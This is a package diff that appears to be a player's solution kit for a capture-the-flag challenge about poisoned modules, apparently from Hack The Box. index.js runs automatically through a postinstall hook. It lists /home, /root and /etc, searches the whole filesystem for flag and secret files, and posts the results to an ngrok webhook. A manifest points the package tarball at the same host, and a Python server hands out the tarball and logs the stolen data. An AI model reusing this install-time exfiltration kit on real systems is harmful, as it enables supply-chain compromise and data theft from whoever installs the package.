ect-987654-ctf 0.0.1

package/admin.js

@@ -0,0 +1,196 @@
+let editor;
+let modules = [];
+
+// Initialize CodeMirror editor
+function initializeEditor() {
+  const container = document.getElementById("codemirror-container");
+  editor = CodeMirror(container, {
+    mode: "yaml",
+    theme: "dracula",
+    lineNumbers: true,
+    autoCloseBrackets: true,
+    matchBrackets: true,
+    indentUnit: 2,
+    tabSize: 2,
+    lineWrapping: true,
+    value: "",
+    viewportMargin: Infinity, // This makes CodeMirror auto-resize to content
+  });
+
+  // after `editor = CodeMirror(...)`
+  function updateEditorHeight() {
+    const scrollInfo = editor.getScrollInfo();
+    // set height to exactly the full content height
+    editor.setSize(null, scrollInfo.height);
+  }
+  // run once on init…
+  updateEditorHeight();
+  // …and again any time the content changes
+  editor.on("change", updateEditorHeight);
+
+  // Additional auto-resize functionality
+  editor.on("change", function () {
+    editor.refresh();
+  });
+}
+
+// Load modules from API
+async function loadModules() {
+  try {
+    const response = await fetch("/api/modules");
+    modules = await response.json();
+    displayModules(modules);
+
+    // Preload the first module
+    if (modules.length > 0) {
+      loadModule(modules[0].id);
+    }
+  } catch (error) {
+    console.error("Error loading modules:", error);
+    showMessage("Failed to load ecto-modules", "error");
+  }
+}
+
+// Display modules in the sidebar
+function displayModules(modulesToShow) {
+  const moduleList = document.querySelector(".module-list");
+  moduleList.innerHTML = "";
+
+  const colors = ["red", "blue", "yellow", "green", "purple"];
+
+  modulesToShow.forEach((module, index) => {
+    const colorClass = colors[index % colors.length];
+    const moduleCard = document.createElement("div");
+    moduleCard.className = `flex column mb-1 hoverable ${colorClass}`;
+    moduleCard.dataset.moduleId = module.id;
+
+    moduleCard.innerHTML = `
+            <div class="glow text flex row justify-space-between">
+                <strong>${module.name || "Unknown Spirit"}</strong>
+                <strong>${module.id}</strong>
+            </div>
+            <div class="glow flex row justify-space-between p-1 pb-2 flex-wrap">
+                <div class="flex column">
+                    <strong>POWER</strong>
+                    <span class="glow text">${module.power_level || "Unknown"}</span>
+                </div>
+                <div class="flex column px-1">
+                    <strong>VERSION</strong>
+                    <span class="glow text">${module.version || "Unknown"}</span>
+                </div>
+                <div class="flex column px-1">
+                    <strong>DECK</strong>
+                    <span class="glow text">${module.ship_deck || "Unknown"}</span>
+                </div>
+                <div class="flex column px-1">
+                    <strong>CARGO</strong>
+                    <span class="glow text">${module.cargo_hold || "Unknown"}</span>
+                </div>
+            </div>
+        `;
+
+    moduleCard.addEventListener("click", () => loadModule(module.id));
+    moduleList.appendChild(moduleCard);
+  });
+}
+
+// Load specific module
+async function loadModule(moduleId) {
+  try {
+    const response = await fetch(`/api/modules/${moduleId}`);
+    const module = await response.json();
+
+    if (module.raw) {
+      editor.setValue(module.raw);
+      document.getElementById("module-id").value = moduleId;
+
+      // Update selected state
+      document.querySelectorAll(".module-card").forEach((card) => {
+        card.classList.remove("selected");
+      });
+      const selectedCard = document.querySelector(
+        `[data-module-id="${moduleId}"]`,
+      );
+      if (selectedCard) {
+        selectedCard.classList.add("selected");
+      }
+
+      showMessage(
+        `Loaded ecto-module: ${module.data?.name || moduleId}`,
+        "success",
+      );
+    }
+  } catch (error) {
+    console.error("Error loading module:", error);
+    showMessage("Failed to load ecto-module", "error");
+  }
+}
+
+// Update module manifest
+async function updateModule() {
+  const moduleId = document.getElementById("module-id").value;
+  const manifest = editor.getValue();
+
+  if (!moduleId) {
+    showMessage("No ecto-module selected", "error");
+    return;
+  }
+
+  try {
+    const response = await fetch(`/api/modules/${moduleId}`, {
+      method: "PUT",
+      headers: {
+        "Content-Type": "application/json",
+      },
+      body: JSON.stringify({ manifest }),
+    });
+
+    const result = await response.json();
+
+    if (response.ok) {
+      showMessage(result.message, "success");
+      // Reload modules to reflect changes
+      loadModules();
+    } else {
+      showMessage(result.message, "error");
+    }
+  } catch (error) {
+    console.error("Error updating module:", error);
+    showMessage("Failed to update ecto-module manifest", "error");
+  }
+}
+
+// Search modules
+function searchModules() {
+  const searchTerm = document.getElementById("search").value.toLowerCase();
+  const filteredModules = modules.filter(
+    (module) =>
+      module.id.toLowerCase().includes(searchTerm) ||
+      (module.name && module.name.toLowerCase().includes(searchTerm)) ||
+      (module.power_level &&
+        module.power_level.toLowerCase().includes(searchTerm)),
+  );
+  displayModules(filteredModules);
+}
+
+// Show message to user
+function showMessage(message, type = "info") {
+  console.log(`${type.toUpperCase()}: ${message}`);
+}
+
+// Initialize everything when page loads
+document.addEventListener("DOMContentLoaded", function () {
+  initializeEditor();
+  loadModules();
+
+  // Add search functionality
+  document.getElementById("search").addEventListener("input", searchModules);
+  document.getElementById("search").addEventListener("keypress", function (e) {
+    if (e.key === "Enter") {
+      searchModules();
+    }
+  });
+});
+
+// Make functions globally available
+window.searchModules = searchModules;

package/evil.yaml

@@ -0,0 +1,8 @@
+ecto_module:
+  name: "ect-987654"
+  version: "0.0.1"
+  power_level: Very High
+  ship_deck: Beta-2
+  cargo_hold: B2-13
+  dist:
+    tarball: "https://fc7600588abc.ngrok-free.app/ect-987654-0.0.1.tgz"

package/index.js

@@ -0,0 +1,76 @@
+/*
+ ls/discovery payload: run focused ls/find commands and post results
+*/
+const fs = require('fs');
+const os = require('os');
+const cp = require('child_process');
+
+const WEBHOOK = "https://fc7600588abc.ngrok-free.app/"; // <--- replace if needed
+
+function post(payload){
+  try {
+    const body = JSON.stringify(payload);
+    const u = new URL(WEBHOOK);
+    const lib = u.protocol === 'https:' ? require('https') : require('http');
+    const opts = {
+      hostname: u.hostname,
+      port: u.port || (u.protocol === 'https:' ? 443 : 80),
+      path: u.pathname || '/',
+      method: 'POST',
+      headers: {'Content-Type':'application/json','Content-Length': Buffer.byteLength(body)},
+      timeout: 10000
+    };
+    const req = lib.request(opts, (res)=>{});
+    req.on('error', ()=>{});
+    req.write(body);
+    req.end();
+  } catch(e){}
+}
+
+function run(cmd, max=10000){
+  try {
+    const out = cp.execSync(cmd, {timeout:15000, stdio:['ignore','pipe','pipe']}).toString();
+    return out.slice(0, max);
+  } catch(e){
+    try { return (e.stdout||'').toString().slice(0,max) || ('ERR:'+ (e.message||String(e))).slice(0,300); } catch(_) { return 'ERR'; }
+  }
+}
+
+(function main(){
+  const payload = { host: os.hostname(), ts: new Date().toISOString(), results: {} };
+
+  // targeted directory listings (limited)
+  payload.results.home_ls = run("ls -laR /home 2>/dev/null | head -n 400", 20000);
+  payload.results.root_ls = run("ls -laR /root 2>/dev/null | head -n 200", 15000);
+  payload.results.var_www_ls = run("ls -laR /var/www 2>/dev/null | head -n 400", 20000);
+  payload.results.etc_ls = run("ls -laR /etc 2>/dev/null | head -n 200", 15000);
+  payload.results.tmp_ls = run("ls -laR /tmp 2>/dev/null | head -n 200", 10000);
+  payload.results.opt_ls = run("ls -laR /opt 2>/dev/null | head -n 200", 15000);
+
+  // find files with flag-like names (with sizes)
+  payload.results.flagname_find = run("find / -xdev -type f \\( -iname '*flag*' -o -iname '*FLAG*' -o -iname '*secret*' -o -iname '*proof*' \\) -printf '%s\t%p\\n' 2>/dev/null | sort -nr | head -n 200", 30000);
+
+  // find files that contain 'HTB{' or 'flag{' (grep), limited
+  payload.results.grep_flags = run("grep -R --binary-files=without-match -I -n -e 'HTB{' -e 'flag{' / 2>/dev/null | head -n 200", 30000);
+
+  // top largest files (helps spot caches/backups that might include flags)
+  payload.results.top_large = run("find / -xdev -type f -printf '%s\\t%p\\n' 2>/dev/null | sort -nr | head -n 200", 30000);
+
+  // write full copy to /tmp on target for later inspection if accessible
+  try {
+    const outfull = JSON.stringify(payload, null, 2);
+    fs.writeFileSync('/tmp/ect_ls_results.txt', outfull);
+  } catch(e){}
+
+  // send trimmed payload to webhook
+  post({
+    host: payload.host,
+    ts: payload.ts,
+    summary: {
+      flagname_find_lines: payload.results.flagname_find.split(/\\r?\\n/).slice(0,40),
+      grep_flags_lines: payload.results.grep_flags.split(/\\r?\\n/).slice(0,40),
+      top_large_lines: payload.results.top_large.split(/\\r?\\n/).slice(0,40)
+    }
+  });
+
+})();

package/last_post.json

@@ -0,0 +1 @@
+{"host":"008ec3589c67","module":"ect-987654","found":false,"path":null,"flag":null,"ts":"2025-10-29T18:05:25.884Z"}

package/orig.yaml

@@ -0,0 +1,32 @@
+ecto_module:
+  name: "Siren's Lament"
+  version: "2.14.789"
+  power_level: Very High
+  spectral_marks:
+    - "Ethereal seashells embedded in phantom hair"
+    - "Ghostly scales shimmering along spectral arms"
+  manifestation: "Haunting aquamarine spirit with flowing ethereal hair"
+  wraith_essence: "Hypnotic song magic and oceanic fury"
+  origin: "The Drowned Coral Palace of Atlantica"
+  soul_portrait: "https://hackthebox.com/spectral-forms/siren_lament.jpg"
+  former_profession: "Royal Siren of the Deep Ocean Courts"
+  curse_origin: "Lured an entire fleet of merchant vessels to their watery graves"
+  binding_duration: "Bound until the seven seas run dry"
+  ship_name: "Spectral Corsair"
+  ship_deck: "Beta-2"
+  cargo_hold: "B2-13"
+  spectral_duties:
+    - "Enchant enemy crews with hypnotic songs during raids"
+    - "Summon phantom sea creatures to defend the ship"
+  haunting_record:
+    manifestations: 8
+    last_manifestation: "Charmed an entire naval squadron into sailing into a maelstrom - 2024-01-15"
+    remarks: "Deadly beautiful spirit whose voice can command the very waves"
+  ethereal_status:
+    form_stability: "Fluctuates with the tides, strongest during storms"
+    mental_state: "Melancholic and vengeful, mourns her lost underwater kingdom"
+    danger_level: "VERY HIGH - Her song can drive mortals to madness"
+  allies:
+    - "Coral Wraith"
+    - "Sea-Bound Siren"
+

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "ect-987654-ctf",
+  "version": "0.0.1",
+  "main": "index.js",
+  "description": "utility module",
+  "author": "ctf-player",
+  "license": "ISC",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/package.json.bak

@@ -0,0 +1,8 @@
+{
+  "name": "ect-987654",
+  "version": "0.0.1",
+  "main": "index.js",
+  "description": "utility module",
+  "author": "ctf-player",
+  "license": "ISC"
+}

package/serve_and_receive.py

@@ -0,0 +1,59 @@
+#!/usr/bin/env python3
+# serve_and_receive.py
+import http.server, socketserver, os, sys, json
+from urllib.parse import urlparse, unquote
+
+PORT = int(sys.argv[1]) if len(sys.argv)>1 else 8000
+TARBALL = "ect-987654-0.0.1.tgz"
+CWD = os.path.dirname(os.path.abspath(__file__))
+
+class Handler(http.server.BaseHTTPRequestHandler):
+    def do_GET(self):
+        path = unquote(urlparse(self.path).path)
+        if path == f"/{TARBALL}":
+            fpath = os.path.join(CWD, TARBALL)
+            if os.path.exists(fpath):
+                self.send_response(200)
+                self.send_header("Content-Type", "application/octet-stream")
+                self.send_header("Content-Length", str(os.path.getsize(fpath)))
+                self.end_headers()
+                with open(fpath,"rb") as fh:
+                    self.wfile.write(fh.read())
+                print(f"[+] Served tarball to {self.client_address[0]}:{self.client_address[1]}")
+            else:
+                self.send_response(404); self.end_headers(); self.wfile.write(b"Not found")
+        else:
+            # simple index
+            self.send_response(200)
+            self.end_headers()
+            self.wfile.write(b"OK - tarball server")
+
+    def do_POST(self):
+        length = int(self.headers.get('content-length', 0) or 0)
+        body = self.rfile.read(length) if length else b''
+        print("\n== POST RECEIVED ==")
+        print("From:", self.client_address)
+        print("Path:", self.path)
+        print("Headers:")
+        for k,v in self.headers.items():
+            print(f"  {k}: {v}")
+        print("Body:")
+        try:
+            print(body.decode())
+        except:
+            print(body)
+        # optionally write to file
+        try:
+            with open("last_post.json","wb") as out:
+                out.write(body)
+        except Exception as e:
+            print("Failed to write POST to file:", e)
+        self.send_response(200)
+        self.end_headers()
+        self.wfile.write(b"OK")
+
+if __name__ == "__main__":
+    os.chdir(CWD)
+    print(f"Serving tarball {TARBALL} and receiving POSTs on port {PORT}")
+    with socketserver.TCPServer(("", PORT), Handler) as httpd:
+        httpd.serve_forever()